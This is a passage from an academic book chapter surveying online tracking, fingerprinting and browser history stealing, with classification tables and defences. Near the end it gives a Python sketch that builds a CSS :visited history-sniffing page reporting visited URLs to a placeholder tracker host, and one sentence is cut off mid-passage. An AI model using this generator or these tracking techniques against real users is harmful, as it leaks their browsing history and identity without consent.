Research and Development in E-Business through Service-Oriented Solutions
Katalin Tarnay University of Pannonia, Hungary & Budapest University of Technology and Economics, Hungary
Sandor Imre Budapest University of Technology and Economics, Hungary
Lai Xu Bournemouth University, UK
A volume in the Advances in E-Business Research (AEBR) Book Series

Managing Director: Lindsay Johnston
Editorial Director: Joel Gamon
Production Manager: Jennifer Yoder
Publishing Systems Analyst: Adrienne Freeland
Development Editor: Myla Merkel
Assistant Acquisitions Editor: Kayla Wolfe
Typesetter: Christina Henning
Cover Design: Jason Mull
Published in the United States of America by Business Science Reference (an imprint of IGI Global) 701 E. Chocolate Avenue Hershey PA 17033 Tel: 717-533-8845 Fax: 717-533-8661 E-mail: [email protected] Web site: http://www.igi-global.com
Copyright © 2013 by IGI Global. All rights reserved. No part of this publication may be reproduced, stored or distributed in any form or by any means, electronic or mechanical, including photocopying, without written permission from the publisher. Product or company names used in this set are for identification purposes only. Inclusion of the names of the products or companies does not indicate a claim of ownership by IGI Global of the trademark or registered trademark.
Library of Congress Cataloging-in-Publication Data
Research and development in e-business through service-oriented solutions / Katalin Tarnay, Sandor Imre and Lai Xu, editors.
pages cm
Includes bibliographical references and index.
Summary: "This book highlights the main concepts of e-business as well as the advanced methods, technologies, and aspects that focus on technical support for professors, students, researchers, developers, and other industry experts in order to provide a vast amount of specialized knowledge sources for promoting e-business"--Provided by publisher.
ISBN 978-1-4666-4181-5 (hardcover) -- ISBN 978-1-4666-4182-2 (ebook) -- ISBN 978-1-4666-4183-9 (print & perpetual access)
1. Service-oriented architecture (Computer science) 2. Data mining. 3. Electronic commerce. I. Tarnay, Katalin. II. Imre, Sándor. III. Xu, Lai, 1970-
TK5105.5828.R47 2013
658.8'72--dc23
2013009512
This book is published in the IGI Global book series Advances in E-Business Research (AEBR) Book Series (ISSN: 1935-2700; eISSN: 1935-2719)
British Cataloguing in Publication Data A Cataloguing in Publication record for this book is available from the British Library.
All work contributed to this book is new, previously-unpublished material. The views expressed in this book are those of the authors, but not necessarily of the publisher.
Chapter 7 Tracking and Fingerprinting in E-Business: New Storageless Technologies and Countermeasures
Károly Boda, Budapest University of Technology and Economics, Hungary
Gábor György Gulyás, Budapest University of Technology and Economics, Hungary
Ádám Máté Földes, Budapest University of Technology and Economics, Hungary
Sándor Imre, Budapest University of Technology and Economics, Hungary
ABSTRACT Online user tracking is a widely used marketing tool in e-business, even though it is often neglected in the related literature. In this chapter, the authors provide an exhaustive survey of tracking-related identification techniques, which are often applied against the will and preferences of the users of the Web, and therefore violate their privacy one way or another. After discussing the motivations behind the information-collecting activities targeting Web users (i.e., profiling), and the nature of the information that can be collected by various means, the authors enumerate the most important techniques of the three main groups of tracking, namely storage-based tracking, history stealing, and fingerprinting. The focus of the chapter is on the last, as this is the field where both the techniques intended to protect users and the current legislation are lagging behind the state-of-the-art technology; nevertheless, the authors also discuss conceivable defenses, and provide a taxonomy of tracking techniques, which, to the authors’ knowledge, is the first of its kind in the literature. At the end of the chapter, the authors attempt to draw the attention of the research community of this field to new tracking methods.
DOI: 10.4018/978-1-4666-4181-5.ch007
Copyright © 2013, IGI Global. Copying or distributing in print or electronic forms without written permission of IGI Global is prohibited.
INTRODUCTION

Many Website operators involved in end-user-oriented e-business have an interest in monetizing their user base (e.g., by realizing as many clicks on their advertisements as possible). One way of achieving this goal is collecting diverse information about the user (or profiling her), the vehicles of which are technologies that can be used for identifying returning visitors, and those that infer sensitive information (such as browsing history) that users are not necessarily willing to disclose (e.g., purchase preferences). This controversial method may be a necessity for better serving the needs of online customers, but it often goes beyond user demands, and is used for business purposes against the will of the clients.

It is not surprising that certain users are concerned about pervasive profiling. In fact, this problem has been discussed from so many viewpoints in academia that not only effective technological, but also more or less effective legislative countermeasures have been implemented in order to mitigate the privacy risks arising from the proliferation of a subset of profiling-related technologies. That said, this chapter is inspired by the rest (primarily by fingerprinting attacks), for which neither defensive technology nor the law seems able to keep up with the pace of development dictated by pro-profiling actors, leaving users of the Web powerless against, and vulnerable to, them.

PROFILING AND USER PRIVACY ON THE WEB

There are several motives for profiling users on the Web. For instance, an enormous number of Web services can be accessed for free; however, contrary to how it looks (or is communicated), free access often comes with a greater sacrifice of user privacy, as many of these companies gain revenue from profiling-related activities, such as pursuing behavioral advertising or monetizing user profiles by other means. According to the IAB Internet Advertising Revenue Report (IAB, 2012), advertising revenues set a new record at $8.4 billion in Q1 2012, clearly showing the significance and the growth of the advertising industry.

In two recent studies, Goldfarb & Tucker (January and May, 2011) concluded that targeted advertising can successfully influence individuals in favor of buying a product, and that targeted advertising has a significant positive (economic) impact on advertising. These claims are consistent with the ever-increasing presence of Web tracking techniques (the most used tools for profiling) and the revenues the industry reached in 2012, presumably with a continuously increasing proportion of behavioral advertising. By summarizing the measurements of Krishnamurthy & Wills between 2006 and 2012 (Krishnamurthy & Wills, 2006; 2009; Krishnamurthy, 2010), Mayer & Mitchell (2012) highlighted that the coverage of top sites by large tracking companies increased during these years, and so did the number of trackers per page. Today, researchers estimate that there are trackers capable of monitoring more than one fifth of user activity while browsing online (Roesner et al., 2012).

However, as can be expected, tracking for targeted advertising is not favored by users. A Harris Interactive poll (Krane, 2008), a TRUSTe survey (2009), and a nationally representative telephone survey in the USA conducted by Turow et al. (2009) uniformly confirmed that the majority of individuals (around 60% in all cases) found it uncomfortable to face advertisements on Websites adjusted to their preferences by previously observing their online activities. A more recent online survey conducted by McDonald & Cranor (2010) also confirmed this result, with 55% of respondents rejecting targeted advertising; another recent survey, conducted by TRUSTe in partnership with Harris Interactive (2011), reported a higher rate of respondents, namely 85%, who
would not consent to being tracked for targeted advertising.

Nevertheless, targeted advertising is not the only goal of tracking and profiling; there are several other commercial use cases. Besides monetizing profiles in trades (i.e., exchanging large databases of pseudonymous profiles), they can be utilized to provide additional user interface features; for example, recommendations on news or Web shop items, customized user interfaces, or to facilitate price discrimination (dynamic pricing, i.e., adjusting price tags for customer price sensitivity for profit maximization of the vendor).

The case of Amazon.com–namely when the company offered the same DVD at different prices to different customers–is a frequently cited example of dynamic pricing (Davis, 2000). After customers discovered pricing differences while discussing their experiences in online forums, Amazon had to remove this feature and apologize for their experiment. Amazon claimed that prices were merely random, instead of being tailored to customer profiles.

Web users relate a bit ambivalently to dynamic pricing. Although it is a known and unpopular feature among them (Cranor, 2003), it becomes rather popular when it is communicated in the form of discounts: according to the survey of McDonald & Cranor (2010), 80% of respondents would consent to tracking to receive discounts tailored to their purchase interests, suggesting that price discrimination is more acceptable if it is communicated as a reward or bonus rather than as a way of invading privacy.

Finally, we mention security, where tracking (and profiling) is applied in order to identify potentially malicious users and prevent intrusions. In practice, this is pursued by many security-sensitive companies, such as banks or credit card companies. For instance, the ThreatMetrix™ Cybercrime Defender Platform uses device identification to identify clients when they detect fraudulent access, to prevent further attacks (ThreatMetrix, 2012); similarly, the Oracle Adaptive Access Manager fingerprints all types of devices (Oracle, 2011). Somewhat in contrast with user attitudes towards commercial tracking, a survey of TRUSTe & Harris Interactive (2011) shows that 42% of respondents would consent to tracking to enhance security and to detect fraud. It must be noted that such identification can be used for quite different and questionable purposes, such as identification for censorship or surveillance, too.

Who Needs Users to be Identified?

There are several actors in the online era arguing against or in favor of identification. Normally, the only participant arguing against is the user herself, for whom identification is an undesired feature, up to the point when it brings benefits (it unlocks extra functionality or the user gains extra credit). On the other hand, there are numerous other participants having their own objectives and goals, who want users to be identified regardless of their privacy preferences.

As has become clear so far, advertising and marketing companies, and other parties pursuing related activities, are the most prominent actors (e.g., search engine optimization, retargeting, analytics services). Profiles can also be used in web shops for product recommendation systems, or for assisting pricing strategies, but arbitrary service providers may use profiles and tracking to enhance the functionality of their services. Among many others, social networks, content providers and distributors, service platforms, and hosting services belong to this category.

Data collectors and traders monetize profiles directly. Identification also plays a strong role in censorship and surveillance, and–as discussed previously–also in security; for example, identification can help prevent click fraud by limiting the number of paid clicks per client per advertisement (Schmücker, 2011). On the other hand, malicious parties, such as identity thieves, phishers, and other kinds of online stalkers, may also find profiles useful.
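As a concrete illustration of the click-fraud defense mentioned above (limiting the number of paid clicks per client per advertisement), the following sketch shows one way such a cap could be enforced once clients are identified. This is our own minimal illustration, not code from Schmücker (2011) or any vendor; the class name and the cap are hypothetical.

```javascript
// Minimal sketch (our own, hypothetical): bill at most `maxPaidClicks`
// clicks per identified client per advertisement; further clicks from
// the same client on the same ad are ignored for billing purposes.
class ClickBillingLimiter {
  constructor(maxPaidClicks) {
    this.maxPaidClicks = maxPaidClicks;
    this.counts = new Map(); // "clientId|adId" -> paid clicks so far
  }

  // Returns true if this click is billable, false once the cap is hit.
  registerClick(clientId, adId) {
    const key = `${clientId}|${adId}`;
    const seen = this.counts.get(key) || 0;
    if (seen >= this.maxPaidClicks) return false;
    this.counts.set(key, seen + 1);
    return true;
  }
}
```

With a cap of two, for instance, a third click from the same identified client on the same advertisement is no longer billed, which blunts simple click-fraud scripts; of course, the defense is only as strong as the underlying client identification.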
The Process of Profiling

In the early years of the Web, tracking was the only way to profile users. Attributes learned by tracking are called implicit data, since these are not expressed by the user, but deduced from her actions. In the early 2000s, with the spread of blogs, social networks, and so forth, and the social content contribution to the services of the Web 2.0 era, another source of information became available, called explicit data, referring to self-expressed information, collected by other means (e.g., using web crawlers) for extending profiles. The development of search engines catalyzed this process by supporting access to public sources of explicit data, to the point where the spread of information became real time (e.g., Shankland, 2010). Instant accessibility and the emergence of a variety of "Web and content archiving" services (e.g., Fitzpatrick, 2012) had a negative effect on user privacy, as it simply eliminated the choice of revocation.

Classification of Information Sources

In their work, Gulyás et al. (2012) categorize profiling sources into three categories (complex profiling techniques may use multiple of these): services of information superpowers (large companies having a large service portfolio capable of capturing a significant fragment of user activity), public data sources, and tracking. Here, we further refine their classification by categorizing sources regarding the data types and the way users typically interact with these sources. (It must be added that exceptional, but less relevant cases do exist; for example, first-party trackers can theoretically be realized, but the advertising business is based rather on third-party trackers.) Our classification is shown in Table 1.

Table 1. Classification of profiling sources

|             | Implicit data                       | Explicit data                       |
|-------------|-------------------------------------|-------------------------------------|
| First party | Services of information superpowers | Services of information superpowers |
| Third party | Tracking                            | Public data sources                 |

According to this classification, a social networking site with a social widget in widespread use over the internet–such as Facebook's Like button–is classified as both using the sources of an information superpower and tracking users. N.b. the case of Facebook may be a bit more complex, as according to an earlier version of their privacy policy, the social service reserved the right to crawl public data sources in order to extend their users' profiles (Gulyás, 2009).

The Three Steps of Profiling

The implications of tracking become visible after understanding the context of identification and related economic activities (i.e., how profiling is performed). Identification itself does no harm to user privacy; the question is how identification is used. The implications of the tracking techniques discussed later in this chapter differ only in the extent of identification (i.e., more generic identification implies larger profiles that have a wider range of use): while some techniques identify the user only in the same browser (e.g., tracking cookies, CSS-based history stealing attacks) or the same device (e.g., cross-browser fingerprinting, Flash PIEs), others achieve device-independent personal identification (e.g., real-world identification via history stealing, biometric fingerprinting).

The scheme of the process of personal data collection is depicted in Figure 1. The goal of the process is to create fine-grained user profiles to be used or sold. In the first step, profilers use the previously discussed information sources for collecting information; the data is processed, combined, and further refined in the second step. In step three, the data can be monetized by several means.

During the collection process, numerous types of data are logged to profiles–we just highlight a few examples. Simply put, trackers can analyze
the visited Websites from different perspectives, such as regarding their content (for contextual advertising), their meaning (for semantic advertising), or the attitude of the creator towards the content itself (for sentiment analysis)–information that is rather static. That said, behavior profiles can also include clickstream information (i.e., how the user navigates through sites, to determine where she strays from the track the advertiser planned, or to predict future behavior, e.g., to determine the willingness to order an item online; Van den Poel & Buckinx, 2005). There are trackers that operate link shortening services and provide content sharing widgets in order to observe social sharing connections (Regalado, 2012). In our opinion, this trend will gain momentum, and advertisers will extend their view to collect even more metadata on daily routine, (social) behavior, and connections.

Figure 1. The process of collecting, processing, and using different types of data

What Do they Collect?

However, trackers also reach towards a lower metalevel. Jang et al. (2010) report several cases of mouse, keyboard, and clipboard tracking. Within the Alexa top 1,300 Websites, they found such tracking in 115 cases, where the tracking happened without any visual feedback to the user. Of these sites, 7 used the behavior tracking service of tynt.com, which reported mouseover and copy events, and also transferred the copied text to tynt.com. Jang et al. also mention another tracker company, ClickTale, who create an aggregate heatmap of mouse movements. According to ClickTale's Website1, in addition to heatmaps, they record mouse clicks, scroll reach, and keystrokes, and offer reports based on the analysis of the data. Besides, Jang et al. note that many sites in their experiments use their own tracking techniques instead of external services.

Service providers, and especially information superpowers, are in an even better position, as they can collect metainformation about the habits of their users. For instance, Google can be aware of their users' acquaintances (via Gmail and Google+), daily routine (with Google Calendar), and interests (via Google Reader), and if Google Search is set as the home page of a browser, Google can estimate when the computer is first turned on and how long it is operated. By utilizing geolocalization techniques, even home and work locations can be determined, which, when coupled together, can be used for unique identification (Golle & Partridge, 2009).

Privacy Implications of Identification

When a user is identified and tracked, her activities are linked together in her profile, meaning a greater loss of user privacy for many reasons. For example, a profiled user can be influenced in her buying decisions, or her search results can be biased according to business objectives. A
profiled user is tied to her past actions, which can be used for abuses or denigration, or may simply cause uncomfortable situations.

As an example, let us imagine a father looking for gifts for his daughter's birthday. After spending a few hours searching online and visiting some related sites, he leaves his laptop on his desk. Later, his daughter arrives and uses his laptop to check out a website. We can imagine how surprised she would be to see the specific gift-related advertisements along the site. Clearly, the father would have liked to separate his gift-searching activities from his regular ones.

The goal would be to separate activities conducted on different sites, or–more formally–to reach the unobservability of the actions of the user (see Figure 2). Regarding a specific site visit, unobservability means anonymity towards this site (i.e., the visitor cannot be identified within the group of visitors), plus undetectability of the visit for both other sites and other Web actors (Pfitzmann & Hansen, 2010). At this time, these goals cannot be accomplished by using default Web browsing software (not even in private browsing mode; Aggarwal et al., 2010); some success, however, can be achieved by using anonymous Web browsers, such as Tor and JondoFox, which are reaching for such high aims (Perry et al., 2011).

Figure 2. The scheme of undetectable web browsing: a request is unobservable for all actors, and anonymous towards communication partners (i.e., websites). Ideally, this means that no actor (neither users nor Websites) can decide whether a given user made a request, and no Website can determine which user made the request it received (responses are proxied through the anonymous Web browsing service).

Penetration of User Tracking Techniques

We differentiate between within- and cross-site trackers only; however, further refinement of this classification is possible regarding the state-of-the-art tracking landscape (Roesner et al., 2012). In the case of the first type of tracker, the tracking cookie is owned by the visited site, and–since the tracker is never visited directly–the cookie is intentionally leaked for tracking (which is referred to as cookie handover). Cross-site trackers own the cookie themselves, enabling tracking of user activities over site boundaries (the cookie can be set from a first- or third-party position, too).

However, both cooperation between trackers and combinations of these types have been reported recently (Roesner et al., 2012). Cooperating trackers share tracking information–such as identifiers and location information upon a visit–which means that a tracker that is not present can learn about it. For instance, Roesner et al. mention the example of admeld.com leaking its tracking cookie and the
top-level page URL to turn.com. Cooperating trackers can seem misleadingly privacy-friendly, as among cooperating parties a single detector that invokes the others later, or sends feedback on detours, can have a larger implication for privacy than it seems. Combination of the tracker types implies that a within-site tracker gains cross-site tracking capability: the within-site tracker is embedded into the detector code of the cross-site tracker (the cookie is owned by the cross-site tracker). In this case, the cross-site tracker learns environmental information about the user via its tracker asset, but identifies the user via the within-site tracker.

Empirical measurements of tracking techniques indicate significant penetration. Gomez et al. (2009) analyzed 393,829 unique domains (collected by the users of the Ghostery Firefox plugin), of which 88.4% used Google Analytics (a within-site tracker); the top 50 Websites contained at least one tracker, but some had as many as 100. Ayenson et al. found Google Analytics to be present on 97 of the QuantCast.com top 100 sites in 2011. In their recent work, Roesner et al. (2012) also confirmed significant tracker presence while analyzing the Alexa top 500, as they found 7,264 instances of 524 trackers present on these sites. According to their work, "tracker morbidity" is depicted as the top 20 trackers being present on 26-297 sites of the top 500.

Trackers benefit from being visited as first-party sites, as they are then allowed to set cookies even when third-party cookies are blocked in the browser agent. Although cross-site trackers are usually not visited directly, there are two exceptions. First, social networking sites are visited voluntarily for their services; second, as confirmed by the results of Roesner et al., some sites force visitors to view them from a first-party position (e.g., by opening a popup window or applying a redirection chain). Clearly, both can be used to circumvent the third-party cookie blocking settings of the browser agent, as in the case of insightexpressai.com, mentioned by Roesner et al.

Penetration of social widgets is also worth mentioning. In May 2011, the presence of Facebook, Google, and Twitter widgets was estimated at 33%, 25%, and 20%, respectively, among the top 1,000 sites (Efrati, 2011), but surprisingly, their presence seems to stagnate. Roesner et al. measured the presence of both Facebook and Google at around 30% among the Alexa top 500 sites, and Twitter at 18.6%. In another recent work, Kontaxis et al. (2012) estimated the presence of the Facebook Like button at 35% among the top 10,000 sites (in June 2012). However, widgets also provide income for another group of services, namely companies hosting embeddable widget collections (e.g., AddThis), who fund their services by selling data obtained by tracking visitors (Mayer & Mitchell, 2012).

As revealed in this section, tracking is widely adopted for profiling users. It is not realistic to assume that these techniques are going to vanish in the near future; rather, on the contrary, we expect them to spread further and to develop new forms to stay one step ahead of consumers. In the next sections, we review currently known and emerging techniques. We discuss storage-based tracking methods first, and "storageless" techniques–which are expected to dominate in the near future–afterwards.

BASIS OF TRACKING: REGULAR TECHNIQUES

In the early years of the Internet, users were uniquely identifiable by their IPv4 addresses, but IP-based tracking soon became obsolete due to the widespread use of network address translation (NAT) and dynamic IP addresses, as in both cases multiple clients may use the same address. Despite its inaccuracy as an identifier, the IP address is still usable when augmented with other information (e.g., the user agent string), and can still play a part in tracking as part of a unique identifier (Yen et al., 2012).
In addition, the IPv4 addresses are
widely used for visitor localization. Free databases exist for pairing addresses with country-city locations, such as IpToCountry (2012), and research indicates that even finer-grained localization is possible, going down to street level (Wang et al., 2011). The role of IP addresses may change in the future as IPv6 is expected to spread, since its addresses are practically capable of covering all existing and future devices, thereby eliminating the need for dynamic or translated addresses.

As IP addresses were no longer reliable, Websites and trackers started to store unique identifiers on visitors' computers, in the storage of their browsers–first in the cookie database. After a while, an increasingly relevant proportion of users started to delete cookies to opt out of tracking, and coevolution has characterized web privacy since then: when trackers develop new tracking techniques, related protection mechanisms follow. In this section, we review the classic storage-based techniques.

Storage-Based Techniques

Cookies have some associated basic protection, such as the same-origin policy: if a Website sets a cookie, only the same site can read it later, allowing the identification of returning visitors, but not cross-site tracking. However, Website operators soon realized that if they installed Web bugs2 on multiple sites, they could easily extend their reach. Web bugs are small, usually 1x1-pixel invisible images, based on a simple mechanism. When the user visits a site and the content is loaded, the Web bug is downloaded from the third-party site (i.e., the tracker), which has a chance to read and write cookies, and can detect the first-party site address through the referrer HTTP header. Therefore, identification is possible, and the Web bug owner can determine particular attributes of the visitor in addition to the IP address and browser agent information. Subsequent tracking techniques usually leverage the same principles with smaller modifications (e.g., using scripts or frames).

Problems related to cookies can be observed with other storage-based mechanisms, too. As we have mentioned previously, some trackers leak cookies intentionally, but malicious third parties may also try to steal cookies, for instance by having their scripts included in the site content, which seems to be common: Yue & Wang (2009) found that 66.4% of sites embedded external scripts in their experiment. In addition, user-contributed content can also contain cookie-stealing malicious scripts (e.g., cross-site scripting). Cookies are sent along with the request, and if they are transmitted without protection, they can be subject to traffic sniffing3 or active sidejacking4. Fortunately, in contrast to cookies, most stored objects are not transmitted automatically (e.g., Flash cookies and HTML5 storages), and are therefore not affected by these threats.

As a relevant fraction of users soon started deleting cookies, trackers moved on to rich internet application storages, such as the Flash (Local Shared Objects) and Silverlight (Isolated Storage) storages. Both plugins are widespread (95.78% and 69.33%, respectively, according to Stat Owl (2012)), and their storages share some characteristics with cookies, with additional advantages (for trackers). Being isolated from the browser, these plugins allow the use of the same identifier in multiple browser agents in parallel (see Figure 3), and default expiration dates also favor tracking–perhaps larger cookie sizes, too. For Flash, cookie size starts from 100 KB (for requests of a larger size, the user is asked for permission), and permanent expiration is set by default (Local Shared Object, 2012). In the first years, lower awareness surrounded these techniques, but nowadays users are more aware, and there are standardized ways to control (and clear) these storages, such as the NPAPI ClearSiteData API (Chandna, 2011).

Figure 3. Cross-browser tracking with Flash storage. After contacting the first site (1), a Flash-based Web bug is downloaded from the tracker (2). After the Web bug is loaded, it sets (or reads, if it exists) the identifier (3) and sends it back to the tracker directly (4), augmented with profiling information (e.g., the subject of site1.com). When visiting another site with another browser, a similar process is executed (5-8), which uses the same storage.

The first announced instance of Flash cookies being used for tracking were the Persistent Identifier Elements (PIEs for short), announced in 2005 (United Virtualities, 2005). Later, Flash cookies were reported to be used for "cookie respawning" (regenerating cookies) to circumvent cookie deletion and user preferences, and were found to be present on 54 of the top 100 sites (Soltani et al., 2009). Recent follow-up research shows that Flash cookies are still present on 37 of the top 100 sites (Ayenson et al., 2011), but a lower rate was confirmed by Roesner et al. (2012), as in their experiment only 35 of 524 trackers used Flash, and it was used as a backup in only 9 cases. The latter authors highlight the particular case of sodahead.com, where the Flash backup cookie was even encoded.

Ayenson et al. (2011) additionally report that trackers are also moving to HTML5 storages, as they found that 17 of the top 100 sites used them. The HTML5 storages allow larger storage (5 MB), and, similarly to Flash, permanent expiration is set as default. Roesner et al. (2012) find that only one percent of the Alexa top 500 stored identifiers in the HTML5 LocalStorage. However, they report two cases where LocalStorage was used instead of cookies, and a case where cookies were respawned from LocalStorage.

Different layers of the browser cache are also exploited for storing identifiers. A cache control mechanism, e-tags (or entity tags), is used as a backup for cookies: for instance, Ayenson et al. (2011) mention kissmetrics.com, and Wramner (2011) describes the use of e-tags in the tracking mechanisms of TradeDoubler. In their intended use, e-tags serve to determine whether an online document has changed compared to the local cache, similarly to fingerprinting (hashing) documents for comparison. As a disadvantage (from the viewpoint of a tracker), e-tags are harder to handle, since reading and writing them requires exact URL matches. On the other hand, e-tags cannot be blocked the way cookies can, and they are even available in private browsing mode. Another
142 Tracking and Fingerprinting in E-Business
control field, the last modified timestamp, can also be exploited similarly to e-tags, simply by giving a unique date to each visitor.

Cached content can also be exploited for storing identifiers. The evercookie (2010) also uses this method: it draws the identifier on some pixels of an image, and then makes the browser cache it. In order to read the image, it is loaded onto an HTML5 canvas, where images can be managed on a pixel-level basis. Other content caches can also be used to store identifiers, such as variables in JavaScript, or entity properties in CSS. Operational

Further Privacy Issues and Techniques Applied

The techniques discussed before can be applied to RSS (or Atom) channels; this is referred to as RSS tracking. In his recent thesis, Danis (2011) analyzed the possibilities of applying regular techniques to RSS channels, and found several flaws in the implementations in browsers and channel reader software. In our opinion, one of his most important findings is that by using internal frames (represented by the
origin of the arriving user (in the form of a URL). However, the URL referer also indicates the URL of the host environment for images and other embeddable content (Flash, Java, internal frames), and can also indicate the keywords the user searched for before arriving on the Website. Lastly, we mention that all on-disk information (especially traces left on public computers) is a potential target of offline attacks via malware, and therefore should be protected carefully.

HISTORY STEALING AND COUNTERMEASURES

History stealing is a way of extracting a part of the history of the browser, information which is otherwise hidden from the prying eyes of a Website operator. In our broader interpretation of the term, it can refer to any way of determining if a site has been visited by the user. N.b. that none of these attacks can directly obtain the full browsing history; the adversary must choose a set of URLs to check before delivering the attack.

Leaking even the partial history can be dangerous; for instance, it can be enough to uniquely identify the user within the group of visitors of a Website. Of course, an attack can also take the more direct approach of attempting to determine if the user regularly browses controversial Websites, or of collecting the list of service providers with which the user does business (e.g., in order to facilitate a subsequent social engineering attack). It must be noted that, while most history stealing attacks normally cannot do more direct damage to the user than that, some go as far as identifying her based on data obtained from a social networking Website (see Classical CSS-Based Attacks), or determining if she is a member of a Website where users must sign in to access certain features (see Cross-Site Timing-Based Attacks).

Early techniques of history stealing exploited a vulnerability that had been included in browsers since the adoption of Cascading Style Sheets (CSS), until the developers of Firefox patched the gaping security hole in the 4th version of their browser (see Classical CSS-Based Attacks). During that period, various authors suggested different methods of acquiring the browser history, but the terminology has never been sufficiently uniform, leading to several different names for the same class of attacks.

The term "history stealing" is used, besides nonacademic contexts such as blog posts, in (Wondracek et al., 2010), while many authors prefer the use of "history sniffing" (Jakobsson & Stamm, 2006; Jang et al., 2010; Weinberg et al., 2011). Finally, others refer to these attacks simply as "history detection" (Janc & Olejnik, 2010a; 2010b), or "history leakage" (Wramner, 2011).

Attacks can be categorized along various properties. First, most of them are scripted (e.g., implemented in JavaScript), though there are some markup language-based methods, too. Secondly, a nonscripted method can either require user interaction to complete the attack, or leak the browser history otherwise (e.g., through CSS). Thirdly, attacks vary in terms of accuracy (i.e., how certain their result is) and robustness (i.e., how much the set of identified elements of browsing history changes over time). Fourthly, certain attacks only query domain names, while others work on the subdomain level. Fifthly, different algorithms perform differently in terms of the number of URLs that can be checked in a reasonable timeframe, and the CPU load they impose. Finally, other important factors include the repeatability and the generality of an attack.

In this section, we survey the history stealing techniques known to date, categorize them based on the properties discussed previously, and also discuss possible protection mechanisms.

Timing-Based Attacks

Timing-based history stealing methods are timing attacks that infer browsing habits by querying the cache of the browser and that of the Domain Name
System (DNS). The algorithms are based on the intuitive assumption that obtaining an object from a cache is significantly faster than getting it from a remote server.

The attack of Felten & Schneider (2000) on the browser cache makes use of a cacheable object (e.g., an image file from the main page of a news portal). The scripted version of the method (Row L, Table 3) measures the access time of the object, and decides that its hosting site has already been accessed if the retrieval takes less time than a predefined threshold. In the nonscripted version (Row K, Table 3), a dummy file is embedded into the attacker's page, followed by the test object, and then another dummy file; the access time of the test object can then be inferred by inspecting the timestamps of retrieving the dummy objects in the log of the Web server. Both variants have an accuracy above 90%, as reported by the authors based on their experiments. It is worth noting that the adversary may also use the cache for tracking purposes via "cache cookies" (Row M, Table 3).

The DNS-based attack (Row J, Table 3) is similar to the previous one, and has the exact same variants, but it is the time to execute a DNS query for a domain that is measured. Felten & Schneider argue that the attack is feasible if the cache miss penalty is significant for a specific domain name server; in such cases, the accuracy is above 90%.

It is uncertain if these attacks are still viable with modern computers. For instance, private browsing mode makes the browser wipe the cache when it terminates, thereby decreasing the accuracy of the browser cache-based attack, and a cache miss is no longer a serious penalty for users with high-speed, flat-rate internet access. In addition, we argue that the use of the first two attacks as a means of tracking a user or profiling her is not viable, as both of them are nonrepeatable (at least in theory). Cache cookies, on the other hand, may be efficient, provided that the cache is not wiped very often, but they require an adversary who can manipulate the expiry times of cached objects.

It must be noted that cache timing-based attacks (Rows N and O, Table 3) seem to be having their renaissance (mansour, 2011; Zalewski, 2011). These new algorithms work around the problem of nonrepeatability by aborting the loading of the cacheable resource after a predefined duration. If the object has finished loading during that timeframe, it is assumed to have been cached. We have not experimented much with these proofs-of-concept, but a short test with Microsoft Internet Explorer 9, Mozilla Firefox 12.0, and Google Chrome 20 on a moderately powerful laptop concluded that these algorithms might not be especially reliable, as they produced a large number of false negatives.

Cross-Site Timing-Based Attacks

It is also possible to mount a cross-site timing attack (Row P, Table 3) in order to infer history for a site where users must log in to access certain content. Such methods embed a test page and a reference page from a domain into the attacker's Webpage, and compare their loading times through the onerror and onload event handlers of JavaScript. In the settings of Bortz et al. (2007), the reference page is chosen such that it displays similarly for a logged-in user and a guest, while the contents of the test page are significantly different between these groups. With certain Websites, it may also be possible to distinguish a logged-out member of the site from non-members through this technique.

Protecting users from cross-site timing attacks is not easy. A conceivable server-side countermeasure is to make each request on a Web server execute in a fixed time, while a client-side countermeasure could be to enforce the same-origin policy in JavaScript for the onload and onerror event handlers.

Classical CSS-Based Attacks

Several attacks rely on CSS, but the automated attacks in Janc & Olejnik (2010) are among the earliest and simplest ones. They exploit the way browsers handle the CSS pseudoclass of visited links, the feature that makes it possible to color (or otherwise format) an already visited hyperlink differently from one that is absent from the history. The nonscripted, automated, CSS-based attack (Row A, Table 2) uses a style sheet that loads a unique background image for a hyperlink if it is in the history. When the victim loads the Web page, the browser makes a request for each URL that corresponds to a visited domain. The scripted variant of the attack (Row B, Table 2) uses the getComputedStyle function of JavaScript to access the style that was actually applied to an HTML element; the script can then directly decide if the corresponding domain has been visited. Both attacks have been well-described at least since 2002 (Baron, 2002).

An attacker can also query addresses under the domain name of a social networking site (Row C, Table 2) with the goal of inferring the actual, real-world identity of the user (Wondracek et al., 2010). In order to pull this off, the adversary must have already crawled the social network; then, a CSS-based attack can be used to discover if the user visited the sites of a predefined set of groups (i.e., online "clubs" with predefined topics to which interested users can subscribe). Assuming that a hit in this set equals an actual membership in the group, the set of hits can be matched against the previously crawled social network data. According to Wondracek et al., 42.06% of the users of the Xing social network could be uniquely identified by this method.

Privacy-preserving history mining (Jakobsson et al., 2008) was proposed to amend the attack with privacy-preserving features (Row D, Table 2), by leaking only predefined categories of visited Websites, instead of distinct domain names.
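To make the nonscripted attack of Row A concrete, the following sketch generates such an attacker page. The beacon domain and element ids are placeholders of our own, and modern browsers (after Baron's fix, discussed below) no longer fetch :visited background images, so this reproduces only the historical, pre-patch attack.

```python
# Sketch of the nonscripted CSS attack (Row A, Table 2): for every candidate
# URL, a hyperlink is emitted whose :visited style loads a per-URL "beacon"
# image from the attacker's server; the browser requests a beacon only for
# links that are in the history. tracker.example is a placeholder domain.
def build_attack_page(candidate_urls):
    rules, links = [], []
    for i, url in enumerate(candidate_urls):
        rules.append(
            f"#l{i}:visited {{ background: url('//tracker.example/hit?i={i}'); }}"
        )
        links.append(f"<a id='l{i}' href='{url}'>&nbsp;</a>")
    return "<style>{}</style>{}".format("\n".join(rules), "\n".join(links))
```

The attacker's Web server then only needs to log which /hit?i=... beacons were requested to learn which candidate URLs are in the victim's history.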
Table 2. Classification of query-based history stealing techniques
ID | Attack | Accuracy | Speed | Technology | Countermeasures | Harm
A | Pure CSS (Janc & Olejnik, 2010) | High | High | CSS | Baron's defenses; pollution; personalization; same-origin caching and styling | Partial history leakage
B | Scripted CSS (Janc & Olejnik, 2010) | High | High | CSS, JS | Baron's defenses; pollution; personalization; same-origin caching and styling | Partial history leakage
C | Social network HS (Wondracek et al., 2010) | High | High | CSS, JS | Baron's defenses; pollution; personalization; same-origin caching and styling | Complete identification (with real name)
D | Privacy-preserving history mining (Jakobsson et al., 2008) | Moderate | High | CSS, JS | Opt-out; Baron's defenses; pollution; personalization; same-origin caching and styling | Coarse-grained information leakage about browsing habits
E | Word CAPTCHA (Weinberg et al., 2011) | High | Low | CSS | Unknown | Partial history leakage
F | Character CAPTCHA (Weinberg et al., 2011) | High | Low | CSS | Unknown | Partial history leakage
